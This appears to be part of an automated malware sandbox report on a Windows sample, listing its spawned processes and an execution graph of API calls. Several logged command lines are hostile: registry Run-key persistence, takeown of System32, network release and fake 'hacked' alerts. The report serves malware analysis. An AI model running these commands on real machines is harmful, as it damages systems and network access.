                  Commandline:C:\Windows\system32\cmd.exe /K Taskdl.bat
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:9
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:10
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\reg.exe
                  Wow64 process (32bit):false
                  Commandline:reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
                  Imagebase:0x7ff739f50000
                  File size:77'312 bytes
                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:12
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\takeown.exe
                  Wow64 process (32bit):false
                  Commandline:takeown /f "C:\Windows\System32" /r
                  Imagebase:0x7ff7dc160000
                  File size:66'560 bytes
                  MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:false

                  Target ID:13
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\reg.exe
                  Wow64 process (32bit):false
                  Commandline:reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
                  Imagebase:0x7ff739f50000
                  File size:77'312 bytes
                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:14
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\ipconfig.exe
                  Wow64 process (32bit):false
                  Commandline:ipconfig /release
                  Imagebase:0x7ff6dfc40000
                  File size:35'840 bytes
                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:15
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\taskkill.exe
                  Wow64 process (32bit):false
                  Commandline:taskkill /im DiskPart /f
                  Imagebase:0x7ff790340000
                  File size:101'376 bytes
                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:16
                  Start time:21:22:58
                  Start date:18/04/2024
                  Path:C:\Windows\System32\attrib.exe
                  Wow64 process (32bit):false
                  Commandline:attrib -r -a -s -h *.*
                  Imagebase:0x7ff7a58b0000
                  File size:23'040 bytes
                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:17
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:18
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:19
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:20
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:21
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:22
                  Start time:21:22:59
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:23
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:24
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:25
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:26
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:27
                  Start time:21:23:00
                  Start date:18/04/2024
                  Path:C:\Windows\System32\msg.exe
                  Wow64 process (32bit):false
                  Commandline:msg * Virus Detectado
                  Imagebase:0x7ff7ff4c0000
                  File size:27'136 bytes
                  MD5 hash:B42553599E40029366A0FD8F81079BED
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:28
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\msg.exe
                  Wow64 process (32bit):false
                  Commandline:msg * Virus Detectado
                  Imagebase:0x7ff7ff4c0000
                  File size:27'136 bytes
                  MD5 hash:B42553599E40029366A0FD8F81079BED
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:29
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\msg.exe
                  Wow64 process (32bit):false
                  Commandline:msg * Has Sido Hackeado!
                  Imagebase:0x7ff7ff4c0000
                  File size:27'136 bytes
                  MD5 hash:B42553599E40029366A0FD8F81079BED
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:30
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Imagebase:0x400000
                  File size:108'544 bytes
                  MD5 hash:8B6A377F9A67D5482A8EBA5708F45BB2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:31
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:32
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:notepad
                  Imagebase:0x7ff7144b0000
                  File size:201'216 bytes
                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:33
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\System32\calc.exe
                  Wow64 process (32bit):false
                  Commandline:calc
                  Imagebase:0x7ff704a90000
                  File size:27'648 bytes
                  MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:34
                  Start time:21:23:01
                  Start date:18/04/2024
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:explorer.exe
                  Imagebase:0x7ff674740000
                  File size:5'141'208 bytes
                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:35
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Windows\System32\mspaint.exe
                  Wow64 process (32bit):false
                  Commandline:mspaint.exe
                  Imagebase:0x7ff6f1e00000
                  File size:988'160 bytes
                  MD5 hash:F221A4CCAFEC690101C59F726C95B646
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:36
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:37
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Imagebase:0x400000
                  File size:108'544 bytes
                  MD5 hash:8B6A377F9A67D5482A8EBA5708F45BB2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:38
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:39
                  Start time:21:23:02
                  Start date:18/04/2024
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:notepad
                  Imagebase:0x7ff7144b0000
                  File size:201'216 bytes
                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:40
                  Start time:21:23:03
                  Start date:18/04/2024
                  Path:C:\Windows\System32\calc.exe
                  Wow64 process (32bit):false
                  Commandline:calc
                  Imagebase:0x7ff704a90000
                  File size:27'648 bytes
                  MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:43
                  Start time:21:23:03
                  Start date:18/04/2024
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:explorer.exe
                  Imagebase:0x7ff674740000
                  File size:5'141'208 bytes
                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:44
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:45
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Windows\System32\mspaint.exe
                  Wow64 process (32bit):false
                  Commandline:mspaint.exe
                  Imagebase:0x7ff6f1e00000
                  File size:988'160 bytes
                  MD5 hash:F221A4CCAFEC690101C59F726C95B646
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:46
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                  Imagebase:0x7ff6781e0000
                  File size:4'099'584 bytes
                  MD5 hash:94675EB54AC5DAA11ACE736DBFA9E7A2
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:47
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Imagebase:0x400000
                  File size:108'544 bytes
                  MD5 hash:8B6A377F9A67D5482A8EBA5708F45BB2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:48
                  Start time:21:23:04
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:49
                  Start time:21:23:05
                  Start date:18/04/2024
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:notepad
                  Imagebase:0x7ff7144b0000
                  File size:201'216 bytes
                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:50
                  Start time:21:23:05
                  Start date:18/04/2024
                  Path:C:\Windows\System32\calc.exe
                  Wow64 process (32bit):false
                  Commandline:calc
                  Imagebase:0x7ff704a90000
                  File size:27'648 bytes
                  MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:51
                  Start time:21:23:05
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:54
                  Start time:21:23:06
                  Start date:18/04/2024
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:explorer.exe
                  Imagebase:0x7ff674740000
                  File size:5'141'208 bytes
                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true


                    Execution Graph

                    Execution Coverage:9.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:1.6%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:80
4023a0 8411->8413 8412 4021b0 9322 405182 TlsGetValue 8412->9322 8415 40e5f0 RtlFreeHeap 8413->8415 8417 4023a8 8415->8417 8416 4021b5 9323 406060 8416->9323 8419 40e5f0 RtlFreeHeap 8417->8419 8422 4023b1 8419->8422 8421 40e560 3 API calls 8423 4021c7 8421->8423 8422->7814 9326 40e520 GetLastError TlsGetValue SetLastError 8423->9326 8425 4021cd 9327 40e520 GetLastError TlsGetValue SetLastError 8425->9327 8427 4021d5 9328 40e520 GetLastError TlsGetValue SetLastError 8427->9328 8429 4021dd 9329 40e520 GetLastError TlsGetValue SetLastError 8429->9329 8431 4021e5 8432 40a290 5 API calls 8431->8432 8433 4021fc 8432->8433 9330 405182 TlsGetValue 8433->9330 8435 402201 8436 406060 5 API calls 8435->8436 8437 402209 8436->8437 8438 40e560 3 API calls 8437->8438 8439 402213 8438->8439 9331 40e520 GetLastError TlsGetValue SetLastError 8439->9331 8441 402219 9332 40e520 GetLastError TlsGetValue SetLastError 8441->9332 8443 402221 9333 40e520 GetLastError TlsGetValue SetLastError 8443->9333 8445 402234 9334 40e520 GetLastError TlsGetValue SetLastError 8445->9334 8447 40223c 9335 4057f0 8447->9335 8449 402252 9351 40e720 TlsGetValue 8449->9351 8451 402257 9352 40e520 GetLastError TlsGetValue SetLastError 8451->9352 8453 40225d 9353 40e520 GetLastError TlsGetValue SetLastError 8453->9353 8455 402265 8456 4057f0 9 API calls 8455->8456 8457 40227b 8456->8457 9354 405182 TlsGetValue 8457->9354 8459 402280 9355 405182 TlsGetValue 8459->9355 8461 402288 9356 408f69 8461->9356 8463 402291 8464 40e560 3 API calls 8463->8464 8465 40229b 8464->8465 8466 40235c 8465->8466 8467 4022ac 8465->8467 8468 401fba 36 API calls 8466->8468 9398 40e520 GetLastError TlsGetValue SetLastError 8467->9398 8468->8485 8470 4022b2 9399 40e520 GetLastError TlsGetValue SetLastError 8470->9399 8472 4022ba 9400 40e520 GetLastError TlsGetValue SetLastError 8472->9400 8474 4022c7 9401 40e520 GetLastError TlsGetValue SetLastError 8474->9401 8476 4022cf 8477 406060 5 API calls 8476->8477 8478 4022da 8477->8478 9402 
405182 TlsGetValue 8478->9402 8480 4022df 8481 40d780 8 API calls 8480->8481 8482 4022e7 8481->8482 8483 40e560 3 API calls 8482->8483 8484 4022f1 8483->8484 8484->8485 9403 40e520 GetLastError TlsGetValue SetLastError 8484->9403 9415 40e520 GetLastError TlsGetValue SetLastError 8485->9415 8487 402307 9404 40e520 GetLastError TlsGetValue SetLastError 8487->9404 8489 402314 9405 40e520 GetLastError TlsGetValue SetLastError 8489->9405 8491 40231c 8492 4057f0 9 API calls 8491->8492 8493 402332 8492->8493 9406 40e720 TlsGetValue 8493->9406 8495 402337 9407 405182 TlsGetValue 8495->9407 8497 402342 9408 408e27 8497->9408 8500 4051a0 3 API calls 8501 402350 8500->8501 8502 401fba 36 API calls 8501->8502 8502->8485 8504 40e660 21 API calls 8503->8504 8523 40197a 8504->8523 8505 4019fb 8506 40a220 RtlAllocateHeap 8505->8506 8507 401a05 8506->8507 9467 40e520 GetLastError TlsGetValue SetLastError 8507->9467 8509 401a0f 9468 40e520 GetLastError TlsGetValue SetLastError 8509->9468 8511 405dc0 3 API calls 8511->8523 8512 401a17 9469 40add6 8512->9469 8513 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8513->8523 8516 40e520 GetLastError TlsGetValue SetLastError 8516->8523 8517 40e560 3 API calls 8518 401a28 GetTempFileNameW 8517->8518 9478 40e520 GetLastError TlsGetValue SetLastError 8518->9478 8520 401a46 9479 40e520 GetLastError TlsGetValue SetLastError 8520->9479 8521 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 8521->8523 8523->8505 8523->8511 8523->8513 8523->8516 8523->8521 8524 401a4e 8525 40a240 4 API calls 8524->8525 8526 401a59 8525->8526 8527 40e560 3 API calls 8526->8527 8528 401a65 8527->8528 9480 40ae67 8528->9480 8534 401a9b 9489 40e520 GetLastError TlsGetValue SetLastError 8534->9489 8536 401aa3 8537 40a240 4 API calls 8536->8537 8538 401aae 8537->8538 8539 40e560 3 API calls 8538->8539 8540 401aba 8539->8540 8541 40ae67 2 API calls 8540->8541 8542 401ac5 8541->8542 8543 40ad45 3 API calls 8542->8543 8544 401ad0 GetTempFileNameW 
PathAddBackslashW 8543->8544 9490 40e520 GetLastError TlsGetValue SetLastError 8544->9490 8546 401afb 9491 40e520 GetLastError TlsGetValue SetLastError 8546->9491 8548 401b03 8549 40a240 4 API calls 8548->8549 8550 401b0e 8549->8550 8551 40e560 3 API calls 8550->8551 8552 401b1a 8551->8552 8553 40ae67 2 API calls 8552->8553 8554 401b25 PathRenameExtensionW GetTempFileNameW 8553->8554 9492 40e520 GetLastError TlsGetValue SetLastError 8554->9492 8556 401b54 9493 40e520 GetLastError TlsGetValue SetLastError 8556->9493 8558 401b5c 8559 40a240 4 API calls 8558->8559 8560 401b67 8559->8560 8561 40e560 3 API calls 8560->8561 8562 401b73 8561->8562 9494 40a200 HeapFree 8562->9494 8564 401b7c 8565 40e5f0 RtlFreeHeap 8564->8565 8566 401b89 8565->8566 8567 40e5f0 RtlFreeHeap 8566->8567 8568 401b92 8567->8568 8569 40e5f0 RtlFreeHeap 8568->8569 8570 401b9b 8569->8570 8571 40469c 8570->8571 8572 40e660 21 API calls 8571->8572 8576 4046a9 8572->8576 8573 40472a 9501 40e520 GetLastError TlsGetValue SetLastError 8573->9501 8574 40e520 GetLastError TlsGetValue SetLastError 8574->8576 8576->8573 8576->8574 8578 405dc0 3 API calls 8576->8578 8585 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 8576->8585 8590 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8576->8590 8577 404730 8579 403539 98 API calls 8577->8579 8578->8576 8580 404746 8579->8580 8581 40e560 3 API calls 8580->8581 8582 404750 8581->8582 9502 40afda 8582->9502 8585->8576 8586 40e5f0 RtlFreeHeap 8587 404764 8586->8587 8588 40e5f0 RtlFreeHeap 8587->8588 8589 40476d 8588->8589 8591 40e5f0 RtlFreeHeap 8589->8591 8590->8576 8592 404522 8591->8592 8593 40e520 GetLastError TlsGetValue SetLastError 8592->8593 8593->7821 8595 40e660 21 API calls 8594->8595 8596 403543 8595->8596 8597 4051a0 3 API calls 8596->8597 8598 40354c 8597->8598 8599 405060 2 API calls 8598->8599 8600 403558 8599->8600 8601 403563 8600->8601 8602 403587 8600->8602 9507 40e520 GetLastError TlsGetValue SetLastError 8601->9507 8603 403591 
8602->8603 8604 4035b4 8602->8604 9515 40e520 GetLastError TlsGetValue SetLastError 8603->9515 8607 4035e7 8604->8607 8608 4035be 8604->8608 8611 4035f1 8607->8611 8612 40361a 8607->8612 9516 40e520 GetLastError TlsGetValue SetLastError 8608->9516 8609 403569 9508 40e520 GetLastError TlsGetValue SetLastError 8609->9508 8610 40359d 8615 40e6c0 4 API calls 8610->8615 9534 40e520 GetLastError TlsGetValue SetLastError 8611->9534 8619 403624 8612->8619 8620 40364d 8612->8620 8621 4035a5 8615->8621 8617 4035c4 9517 40e520 GetLastError TlsGetValue SetLastError 8617->9517 8618 403571 9509 40ae75 8618->9509 9536 40e520 GetLastError TlsGetValue SetLastError 8619->9536 8623 403680 8620->8623 8624 403657 8620->8624 8630 40e560 3 API calls 8621->8630 8622 4035f7 9535 40e520 GetLastError TlsGetValue SetLastError 8622->9535 8628 4036b3 8623->8628 8629 40368a 8623->8629 9538 40e520 GetLastError TlsGetValue SetLastError 8624->9538 8640 4036e6 8628->8640 8641 4036bd 8628->8641 9540 40e520 GetLastError TlsGetValue SetLastError 8629->9540 8637 403582 8630->8637 8633 4035cc 9518 40aeba 8633->9518 8634 403578 8643 40e560 3 API calls 8634->8643 8635 40362a 9537 40e520 GetLastError TlsGetValue SetLastError 8635->9537 9505 40e520 GetLastError TlsGetValue SetLastError 8637->9505 8638 4035ff 8649 40aeba 17 API calls 8638->8649 8639 40365d 9539 40e520 GetLastError TlsGetValue SetLastError 8639->9539 8647 4036f0 8640->8647 8648 403719 8640->8648 9542 40e520 GetLastError TlsGetValue SetLastError 8641->9542 8643->8637 8645 403632 8653 40aeba 17 API calls 8645->8653 8646 403690 9541 40e520 GetLastError TlsGetValue SetLastError 8646->9541 9544 40e520 GetLastError TlsGetValue SetLastError 8647->9544 8660 403723 8648->8660 8661 403749 8648->8661 8657 40360b 8649->8657 8663 40363e 8653->8663 8669 40e560 3 API calls 8657->8669 8658 403665 8670 40aeba 17 API calls 8658->8670 8659 4036c3 9543 40e520 GetLastError TlsGetValue SetLastError 8659->9543 9546 40e520 GetLastError TlsGetValue SetLastError 
8660->9546 8667 4037a1 8661->8667 8668 403753 8661->8668 8662 40e560 3 API calls 8721 4035e2 8662->8721 8674 40e560 3 API calls 8663->8674 8664 4037cb 8675 40e6c0 4 API calls 8664->8675 8665 403698 8676 40aeba 17 API calls 8665->8676 8666 4036f6 9545 40e520 GetLastError TlsGetValue SetLastError 8666->9545 9576 40e520 GetLastError TlsGetValue SetLastError 8667->9576 9548 40e520 GetLastError TlsGetValue SetLastError 8668->9548 8669->8721 8680 403671 8670->8680 8673 403729 9547 40e520 GetLastError TlsGetValue SetLastError 8673->9547 8674->8721 8683 4037d3 8675->8683 8684 4036a4 8676->8684 8688 40e560 3 API calls 8680->8688 8681 4036cb 8689 40aeba 17 API calls 8681->8689 9506 405170 TlsGetValue 8683->9506 8693 40e560 3 API calls 8684->8693 8685 4036fe 8694 40aeba 17 API calls 8685->8694 8686 403759 9549 40e520 GetLastError TlsGetValue SetLastError 8686->9549 8687 4037a7 9577 40e520 GetLastError TlsGetValue SetLastError 8687->9577 8688->8721 8690 4036d7 8689->8690 8697 40e560 3 API calls 8690->8697 8691 403731 8698 40aeba 17 API calls 8691->8698 8693->8721 8700 40370a 8694->8700 8697->8721 8703 40373d 8698->8703 8699 4037da 8708 40e5f0 RtlFreeHeap 8699->8708 8704 40e560 3 API calls 8700->8704 8701 403761 9550 409355 8701->9550 8702 4037af 8706 40ae75 5 API calls 8702->8706 8707 40e560 3 API calls 8703->8707 8704->8721 8710 4037b6 8706->8710 8707->8721 8712 4037f2 8708->8712 8711 40e560 3 API calls 8710->8711 8711->8637 8715 40e5f0 RtlFreeHeap 8712->8715 8713 40e560 3 API calls 8714 40377c 8713->8714 8717 403795 8714->8717 8718 403789 8714->8718 8716 4037fa 8715->8716 8716->7824 8720 401fba 36 API calls 8717->8720 9573 4056d8 8718->9573 8720->8721 8721->8637 8722->7828 8723->7830 8725 40e660 21 API calls 8724->8725 8726 402bb0 8725->8726 